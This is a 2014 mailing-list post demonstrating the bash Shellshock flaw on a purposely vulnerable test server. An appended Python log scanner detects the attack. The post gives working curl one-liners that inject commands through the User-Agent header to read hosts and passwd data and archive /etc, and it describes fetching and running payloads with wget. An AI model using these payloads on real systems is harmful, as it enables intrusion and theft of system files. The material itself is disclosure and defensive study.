Bottom posting, just because...

On 26/09/2014, at 6:01 pm, Steve Holdoway <st...@greengecko.co.nz> wrote:
> On Fri, 2014-09-26 at 17:40 +1200, Chris Hellyar wrote:
>> (Sorry long post. :-)
>>
>> php code, run on debian/apache/php, called from my desktop with chrome:
>> <? system("bash -c set"); ?>
>>
> [snip]
> So following on from my earlier comment that the only people I expect to
> see using CGI are developers with aspirations, how does this work with
> apache and
>
> - fastcgi
> - SuPHP
>
> modes, both of which (ignoring the unbelievable performance hit of the
> latter) will be far more common, and what difference does the
> population of disable_functions in php.ini make (and short_open_tag
> lol)?
>
> Sorry to ask, no apache close by.

One shiny, fresh linode apache 2.2.22 on wheezy with fastcgi: (You'll see why a clean box further down...)

http://clug.trash.co.nz/clug_phpinfo.php

Default packages, per linode build with one exception, no hardening or config.

php code per above, fast cgi:

http://clug.trash.co.nz/clug_set.php

I didn't set up suPHP. Does anyone actually use that?

And the variation from standard... (which I'm sure you probably guessed) I downgraded the linode standard image with the exploitable bash.

And because I'm a really lousy developer with no idea what I'm doing I put some bash scripted pages online...

http://clug.trash.co.nz/cgi-bin/clug.sh

As well as the set one:

http://clug.trash.co.nz/cgi-bin/clug_set.sh

Now to the point of this rather long thread, and the reason I used a clean box: so folks could play if they are so inclined. To see exactly how simple / bad this issue is...

Previous remote exploits I've coded against have taken hours of work and quite a few steps/processes. This one is as simple as running this one-liner at the command line:

curl -H 'User-Agent: () { :;}; echo; /bin/cat /etc/hosts' http://clug.trash.co.nz/cgi-bin/clug.sh

Copy and paste it... You'll get a copy of the local hosts file.

How about:

curl -H 'User-Agent: () { :;}; echo; /usr/bin/getent passwd' http://clug.trash.co.nz/cgi-bin/clug.sh

Which gives you the local passwd file. But wait... It gets better...

curl -H 'User-Agent: () { :;}; echo; /bin/tar -czf - /etc' http://clug.trash.co.nz/cgi-bin/clug.sh -o out.tgz

Will give you a 470k tar ball of everything you can read as the www-data user.

Doesn't take much imagination to see why this is a big problem. You can stick 'wget' statements in there, pull a file into /tmp, chmod it, execute it... you get the idea.

I'll leave this box up till the end of the weekend so everyone gets a chance to play... Please be sensible though... As you can see it's not hard to break if you apply a bit of imagination. If you wget stuff, stick it in /tmp and name it. Monday morning after I nuke the box the IP address will be released to some other random linode customer. Please don't keep on 'attacking' it.

If anyone would like a temp. user on the box to play with this a bit more drop me an email and I'll create one for you with root access. On the basis that if you break it the others on the list who wanted to play will track you down and beat you with a blunt instrument.

Somewhat obviously, if you do want to play with an account on the box don't do an apt-get upgrade... That'll kinda defeat the point!

Semi-interesting is to watch the apache logs... you can see the dodgy entries go past... (tail -f /var/log/apache2/access.log fyi)

Cheers,
Chris H.
_______________________________________________
Linux-users mailing list
Linux-users@lists.canterbury.ac.nz
http://lists.canterbury.ac.nz/mailman/listinfo/linux-users
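Chris's closing tip is to watch access.log for the dodgy entries going past. As an added example that is not part of the original post, here is a small Python scanner over constructed Apache combined-format log lines that flags any logged request field carrying a bash function definition (`() {`), the marker that every one of the curl one-liners above sends in its User-Agent. The sample lines, client addresses and timestamps are constructed for the example.

```python
import re
from typing import Dict, List, Optional

# Apache "combined" LogFormat:
#   %h %l %u %t "%r" %>s %b "%{Referer}i" "%{User-Agent}i"
# Quoted fields may contain \" escapes, so match escaped characters too.
_Q = r'(?:[^"\\]|\\.)*'
COMBINED_RE = re.compile(
    r'^(?P<host>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<request>' + _Q + r')" '
    r'(?P<status>\d{3}) (?P<bytes>\S+) "(?P<referer>' + _Q + r')" '
    r'"(?P<agent>' + _Q + r')"$'
)

# A bash exported-function definition starts with "()" followed by "{";
# whitespace in between is optional, so match both "() {" and "(){".
FUNC_DEF_RE = re.compile(r'\(\)\s*\{')

# Fields Apache passes to a CGI child as environment variables, which is
# where a vulnerable bash would evaluate the function body.
WATCHED_FIELDS = ("agent", "referer", "request")

def scan_line(line: str) -> Optional[Dict[str, str]]:
    """Return a finding for one log line, or None if it looks clean."""
    m = COMBINED_RE.match(line.rstrip("\n"))
    if not m:
        return None  # not a combined-format line; skip rather than guess
    for field in WATCHED_FIELDS:
        if FUNC_DEF_RE.search(m.group(field)):
            return {"host": m.group("host"), "time": m.group("time"),
                    "field": field, "request": m.group("request")}
    return None

def scan_log(lines) -> List[Dict[str, str]]:
    """Scan an iterable of log lines and return all findings in order."""
    return [hit for hit in (scan_line(ln) for ln in lines) if hit]

# Constructed sample: one normal browser hit, one probe in the User-Agent
# (the header from the thread), one probe in the Referer with no space.
SAMPLE_LOG = [
    '203.0.113.5 - - [26/Sep/2014:18:02:11 +1200] "GET /cgi-bin/clug.sh HTTP/1.1" '
    '200 512 "-" "Mozilla/5.0 (X11; Linux x86_64)"',
    '198.51.100.7 - - [26/Sep/2014:18:05:43 +1200] "GET /cgi-bin/clug.sh HTTP/1.1" '
    '200 174 "-" "() { :;}; echo; /bin/cat /etc/hosts"',
    '198.51.100.9 - - [26/Sep/2014:18:06:02 +1200] "GET /cgi-bin/clug_set.sh HTTP/1.1" '
    '200 981 "(){ :;}; echo; /usr/bin/getent passwd" "curl/7.26.0"',
]

if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print(f'{hit["time"]} {hit["host"]} via {hit["field"]}: {hit["request"]}')
```

Pipe a live log through it with `tail -f /var/log/apache2/access.log | python3 -c '...'` style wrappers as you prefer; the scanner only reads whatever Apache already writes, so it sees the header regardless of whether the CGI target was vulnerable.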